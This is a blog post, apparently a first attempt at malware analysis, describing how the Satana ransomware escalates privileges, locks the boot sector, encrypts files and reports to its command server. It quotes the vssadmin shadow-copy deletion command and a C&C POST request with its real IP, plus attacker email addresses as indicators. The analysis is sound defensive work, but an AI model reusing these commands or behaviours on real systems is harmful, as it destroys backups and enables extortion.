Satana Malware Analysis

I haven’t done any malware analysis before and this would be my first post related to malware. I’m really interested but still quite a lot of things to learn 🙂 so I thought of starting off somewhere and this is the analysis of the ransomware named “Satana” by me. Obviously I hope you know who is Satan 👿

Samples:

Behavior Analysis

As soon as you run this the main executable will be deleted and a new sample will be created inside the %temp% folder.

The following is the disassembly corresponding to this event.


The application gives us the UAC prompt. No matter we press no the prompt will keep prompting.
When click yes it will start writing the malicious bootlocker code to the beginning of the disk.
The contact data relevant to each client is stored in the registry.

This malware also stores the ransomware message to the startup of the system.

This malware calls the OutputDebugString function to output debug information. This shows that this malware might be under a developing stage. We can use debugview to view the debug messages generated by the malware.

Also shows us the encrypting files in progress.

This malware will encrypt files with the following extensions:

.bak .doc .jpg .jpe .txt .tex .dbf .db .xls
.cry .xml .vsd .pdf . csv .bmp .tif .1cd .tax
.gif .gbr .png .mdb .mdf .sdf .dwg .dxf .dgn
.stl .gho .v2i .3ds .ma .ppt .acc .vpd .odt
.ods .rar .zip .7z .cpp .pas .asm

Also will delete the shadow copies of backups in the hard disk by using vssadmin.exe with the following parameters.

Delete Shadows /All /Quiet

This is how the files would look like. All encrypted files are renamed to: __

These are all the emails in this malware.


matusik11@techemail.com
Sesillil@techemail.com
Monika343@ausi.com
adamadam@ausi.com
Gricakova@techemail.com
Missganz@ausi.com
Sarah_G@ausi.com
khoperia331@mail.com
orjovaja@mail.com
ryanqw31@gmail.com
banetnatia@mail.com
megrela777@mail.com
rayankirr@gmail.com
lanachka888@mail.com
Khaprov_igor@mail.com

After encrypting we see this ransomware message.

Once you click OK the system will restart and you will the bootlocker screen.

Dynamic Analysis

The malware has many ways of execution. First it checks for parameters.

When no parameters are supplied the malware will deploy itself into the %temp% directory and will execute the dropped version with GUID and the original path as runtime arguments deleting the original file from the location.


"C:\Users\user\AppData\Local\Temp\cmh.exe" {e29ac6c0-7037-11de-816d-806e6f6e6963} "C:\Users\user\Desktop\ee.exe"

Once the user runs this malware it will try run as an administrator by making the user click yes. Even we click no the UAC prompt will be displayed. The authors call this as “Admin Flood”. Frist it will check for admin using setupapi.IsUserAdmin if we have admin right the parameter passed to ShellExecute is “open” if not “runas” and try to get admin privs.

The GUID is mentioned in the ransomware note.

This is how this malware enumerates the disks.

Encryption

This malware divides the file into 32 byte long chunks and each chunk is encrypted separately. Before encrypting this malware generates a random key using the Read Time-Stamp Counter (RTDSC) function.

After that the content of this buffer is converted to ASCII DWORD by DWORD.

In my case the Key generated is:

7347D5A47560AED72D6D7CE4DDFC3B84B252405B2B171F492C3506F36686B85

This key is generated only once in each run.


0040F128 A4 D5 47 73|D7 AE 60 75|E4 7C 6D 2D|84 3B FC DD
0040F138 05 24 25 0B|F4 71 B1 B2|6F 50 C3 92|85 6B 68 36|


7347D5A4 7560AED7 2D6D7CE4 DDFC3B8 4B252405 B2B171F4 92C3506F 36686B85

Next the chunk of file are XORed in DWORD size units with the first 4 DWORDs of the random buffer. Next they are passed into the another Crypt2 cipher.

Network Communication

This malware send the following POST request to the C&C. Also notice that without encryption to the C&C the key is lost and even you pay you won’t get the files back if you or the C&C was offline while encryption is happening.

/add.php HTTP/1.0
Host: 185.127.26.186
Content-type: application/x-www-form-urlencoded
Content-length: 115

id=7&code=100&sdata=6.1.7600 0 1 WIN-C9AMVRVHN0T user 0&name=payload.exe&md5=&dlen=7EA61278DFBAD65AE31E707FFE019711

Anti-Reversing Tricks

At the start you can see this malware calls the ntdll.NtQueryInformationProcess kernel API and changes the execution if the result is a non zero value.

Other Findings

  • This malware won’t properly run on Windows XP, since vssadmin.exe is not present it gives us a error.
  • On testing this on VMWare we don’t see the bootlocker, only on VBox it was visible.

For a better analysis check out hasherazade’s post on this malware:

Satana ransomware – threat coming soon?

Advertisements

One thought on “Satana Malware Analysis

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s